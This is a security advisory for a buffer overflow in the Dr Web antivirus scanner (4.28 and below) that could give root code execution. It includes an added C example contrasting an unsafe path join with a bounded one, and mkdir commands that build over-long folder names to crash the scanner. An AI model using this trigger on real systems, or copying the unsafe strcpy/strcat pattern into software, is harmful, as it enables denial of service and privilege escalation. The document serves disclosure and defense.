Dr. WEB is an antivirus scanner. The new generation (DrWeb32) includes programs for Windows 95/98/ME/2000/NT/XP, DOS/386, OS/2, Novell NetWare, Linux, FreeBSD 3.xx and 4.xx and Solaris x86. A vulnerability in Dr Web allows a user with access to the server to gain root privileges by overflowing a buffer in the program.
Credit:
The information was provided by David Fernandez Madrid.
Vulnerable versions:
* Dr Web Version 4.28 and below
Immune versions:
* Dr Web Version 4.29b and above
When a user with access to the system creates files with a very long name, the name overflows a buffer in the program and overwrites EIP, which lets the user execute arbitrary code with root privileges.
The program consists of a monitor and a scanner. Only the scanner option was tested, on version 4.28a, and it was found vulnerable.
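The advisory does not show the vulnerable code. The following added example (not Dr Web's code, and not from the original advisory) illustrates the bug class it describes: a scanner joining directory and file names into a fixed-size buffer, first without a length check and then with a bounded, checked form. The buffer size SCAN_PATH_MAX and all function names are assumptions made for illustration.

```c
/* Added illustration, not Dr Web code; all names here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define SCAN_PATH_MAX 256   /* assumed fixed buffer size, for illustration */

/* Unsafe pattern behind this bug class: no length check, so a long name
 * writes past dst and can reach the saved return address (EIP). Not called. */
void join_unsafe(char *dst, const char *dir, const char *name)
{
    strcpy(dst, dir);
    strcat(dst, "/");
    strcat(dst, name);
}

/* Hardened form: bounded write, truncation treated as an error.
 * Returns 0 on success, -1 if "dir/name" does not fit in dst. */
int join_checked(char *dst, size_t dstlen, const char *dir, const char *name)
{
    int n = snprintf(dst, dstlen, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= dstlen) {
        if (dstlen > 0)
            dst[0] = '\0';  /* never hand a truncated path to the scanner */
        return -1;
    }
    return 0;
}

/* Constructed input: a 200-character name nested two levels deep.
 * Returns how many levels were rejected instead of overflowing. */
int demo_nested_long_names(void)
{
    char name[201], l1[SCAN_PATH_MAX], l2[SCAN_PATH_MAX];
    int skipped = 0;
    memset(name, 'A', 200);
    name[200] = '\0';
    if (join_checked(l1, sizeof l1, "", name) != 0)   /* 201 bytes: fits */
        skipped++;
    if (join_checked(l2, sizeof l2, l1, name) != 0)   /* 402 bytes: rejected */
        skipped++;
    return skipped;
}

int main(void)
{
    printf("levels skipped: %d\n", demo_nested_long_names());
    return 0;
}
```

A scanner built this way logs and skips the over-long entry instead of crashing or corrupting the stack.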
Exploit:
Build a folder with a very long name:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
Or:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Which form applies depends on the system.
When the antivirus tries to scan the folder, it crashes.
Solution:
Download the latest version from Dr Web (Newest Versions).